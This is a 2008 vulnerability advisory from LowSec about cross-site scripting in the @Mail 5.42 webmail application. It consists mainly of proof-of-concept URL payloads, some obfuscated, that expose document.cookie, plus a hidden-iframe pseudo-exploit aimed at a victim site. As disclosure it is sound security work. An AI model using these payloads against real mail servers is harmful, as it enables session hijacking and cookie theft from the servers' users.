#=======================================================================# .____ _________ ._. | | ______ _ __/ _____/ ____ ____| | | | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ | | |__( <_> ) / / \ ___/\ \___\| |_______ \____/ \/\_/ /_______ /\___ >\___ >_ \/ \/ \/ \/\/ (http://wwwlowsec.org) #========================================================================# #========================================================================# Author: C1c4Tr1Z Date: 30/08/08 Application: @Mail 5.42 (28/11/2007) Product WebSite: http://atmail.com/ Issues: [-]Cross-Site Scripting #========================================================================# #=============================[XSS]======================================# This application suffers from numerous Cross-Site Scripting.With some JavaScript knowledge, we are able to execute JS codes to stealcookies to use the sessions, or anothers changes/actions. POC: /parse.php?file="><img/src/onerror=alert(document.cookie)> /parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo=' /showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo=' /abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195 /showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie) Pseudo-Exploit: <iframe src="http://www.victim.com/parse.php?file=%22%3E%3Cimg/src/onerror=alert(document.cookie)%3E" frameBorder="0" style="height:0px;width:0px;"> #========================================================================# #========================================================================# Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org> (http://wwwlowsec.org) LowSec! Web Application Security (Lab). Deus ex Machina #========================================================================#